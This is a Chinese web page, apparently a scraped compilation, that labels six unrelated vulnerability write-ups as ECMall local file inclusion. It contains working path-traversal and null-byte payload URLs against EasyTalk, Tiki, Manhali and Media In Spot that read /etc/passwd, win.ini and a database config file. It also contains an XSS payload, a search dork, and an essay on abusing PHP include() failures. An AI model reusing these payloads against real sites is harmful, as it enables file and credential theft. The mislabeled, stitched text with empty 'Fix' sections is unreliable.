ECMall本地文件包含漏洞

2024-05-14

ECMall本地文件包含漏洞(共6篇)

篇1:ECMall本地文件包含漏洞

by Ryat

www.wolvez.org

-2-22

引用:

本地文件包含漏洞是PHP中比较常见的漏洞,像下面的代码:

include(inc/.$_GET[a]./global.php);

这是个典型的文件包含漏洞,但要想包含任意文件的话需要引入NULL字符截断后面的/global.php,但在gpc为on的情况下null是会被转义的,这往往成了本地文件包含漏洞利用的束缚(在一些特定的情况下也可以用其他方法截断后面的代码,见:html“>www.wolvez.org/forum/thread-55-1-1.html)

其实文件包含分为include()和 require()两种,先看下手册中对这两种方式区别的描述:

这两种结构除了在如何处理失败之外完全一样,include() 产生一个警告而 require() 则导致一个致命错误。换句话说,如果想在遇到丢失文件时停止处理页面就用 require()。include() 就不是这样,脚本会继续运行

手册中对两种方式的区别说的很清楚,而include()的这种对待包含失败的处理方式有时会给我们在利用本地文件包含漏洞上提供一些其他的思路,看下下面的代码片断:

...

if (!empty($_COOKIE[”userlanguage“]) && file_exists(”lang/“ . basename($_COOKIE[”userlanguage“]) . ”/global.php“)) $language = $_COOKIE[”userlanguage“];

...

include_once(”lang/$language/index.php“);

...

$template = preg_replace(”/{langs+(.+?)}/ies“, ”languagevar(1)“, $template);

...

fwrite($fp, $template);

...

function languagevar($var) {

if(isset($GLOBALS[lang][$var])) {

return $GLOBALS[lang][$var];

} else {

return ”!$var!“;

}

}

...

简单说下代码的处理流程,程序根据浏览者选择的语言把相应的$lang写进模板缓存,当浏览者访问时直接访问模板缓存,

而这里可以通过$_COOKIE[”userlanguage“]触发本地文件包含漏洞,这样提交:

../../[file][null char]/eng

通过basename()返回eng,而/lang/eng/global.php是存在的,绕过了file_exists()的检查,成功触发了本地文件包含漏洞,但这里需要GPC为OFF,因为要引入NULL字符截断后面的字符串。貌似利用很困难,但我们可以转换下思路,这里include_once()正确包含的话会包含语言文件,语言文件里面定义了$lang,这里是关键了,我们只要随便提交$_COOKIE[”userlanguage"],使include_once()无法正确包含,而前面提到include()即使包含失败,脚本依旧会向下执行,这样没有包含语言文件,$lang就是没有初始化的了,那么在register_globals为on或用了extract()的情况下,我们就可以自行提交$lang了,然后通过fwrite()写入了缓存文件:)

其实这个思路就是把include()本地文件包含漏洞转化为其他漏洞,是个典型的二次攻击:)

篇2:ECMall本地文件包含漏洞

发布作者:sw0rder

影响版本:EasyTalk

:www.9italk.com/

漏洞类型:文件包含

漏洞描述:

漏洞文件在“wap/index.php”,关键代码如下:

具体利用:

新建一个账户,在首页写话题处上传捆后的图片,这里传后可以显示出文件名,在服务器中会出现两个图片,一个源图片,一个处理过的,

EasyTalk 微博本地文件包含漏洞漏洞预警

且已自身 id 为目录命名(id 可从右上方看到),那么图片路径就是:attachments/photo/user_id/图片名.jpg。

测试:

127.0.0.1/easytalk/wap/in ... ents/photo/user_id/图片.jpg%00.

另外,关于截断方面可以用较多的/来试试 有时候会有效果,php版本别太新否则截断会无效的hoho

篇3:ECMall本地文件包含漏洞

网站/tiki-5.2/tiki-jsplugin.php?plugin=x&language=../../../../../../../../../../windows/win.ini

跨站脚本漏洞:

网站/tiki-5.2/tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(0)%3C/script%3E

注:首发孤独浪子,由情整理编辑

防范:

篇4:ECMall本地文件包含漏洞

作者: L0n3ly-H34rTl0n3ly_h34rt@hotmail.com

程序开发: www.manhali.com/

下载地址: sourceforge.net/projects/manhali/files/manhali_1.8.zip/download

影响版本: 1.8 (或许老版也受影响,未检查)

测试系统: Linux/Windows

############################################

# P.O.C :

/manhali/includes/download.php?f=../includes/dbconfig.php

############################################

篇5:ECMall本地文件包含漏洞

#Date : May,16

#Vendor Url :http:www.mediainspot.com/

#Dork:“

”Powred By Media In Spot“”

#Author : wlhaan haker

#############################################################

Exploit:

server/path/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd

###############################################################

Fix:

demo

/view/lang/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd

/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd

/ufp/view/lang/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd

篇6:ECMall本地文件包含漏洞

BUGTRAQID: 19702

CVE(CAN) ID: CVE--4538

Linux Kernel是开放源码操作系统Linux所使用的内核,

Linux Kernel的IA64和SPARC平台版本在处理某些ELF文件时存在漏洞,可能在跨区域映射时导致系统崩溃,本地攻击者可能利用此漏洞对系统执行拒绝服务攻击,

<*来源:Kirill Korotaev (dev@sw.ru)

链接:secunia.com/advisories/2/

lkml.org/lkml/2006/9/4/116

*>

建议:

厂商补丁:

Linux

-----

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

上一篇:丰台镇杨涝池村2016年精准扶贫帮扶计划下一篇:九月秋季开学第一课观后感